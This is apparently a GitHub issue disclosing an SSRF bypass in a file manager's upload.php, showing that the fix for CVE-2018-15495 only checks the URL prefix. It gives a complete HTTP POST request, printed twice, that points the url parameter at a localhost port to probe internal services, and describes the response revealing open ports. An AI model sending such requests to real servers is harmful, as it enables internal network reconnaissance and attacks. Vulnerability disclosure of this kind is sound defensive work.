You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
In upload.php we can download a pic in remote server. code in line 68~91。
Jul 27, 2018 commit a fix to limit url in order to prohibit ssrf vuln CVE-2018-15495
but the fix only check the parm url startwith http:// or https://
we still can use http protocol to Probe intranet and attack intarnet server。For Example:
`POST /filemanager/upload.php HTTP/1.1
Host: localhost
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=9gov40jg57e4bo2olu5rqr8oc0; login=76a61a8504394f9c08ec4d7d747d3377
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
In upload.php we can download a pic in remote server. code in line 68~91。
Jul 27, 2018 commit a fix to limit url in order to prohibit ssrf vuln
CVE-2018-15495
but the fix only check the parm url startwith http:// or https://
we still can use http protocol to Probe intranet and attack intarnet server。For Example:
`POST /filemanager/upload.php HTTP/1.1
Host: localhost
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=9gov40jg57e4bo2olu5rqr8oc0; login=76a61a8504394f9c08ec4d7d747d3377
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
fldr=test/&url=http://127.0.0.1:2233/aaaaaaa`
and when the port is open will response {"error":"Invalid URL"}
The text was updated successfully, but these errors were encountered: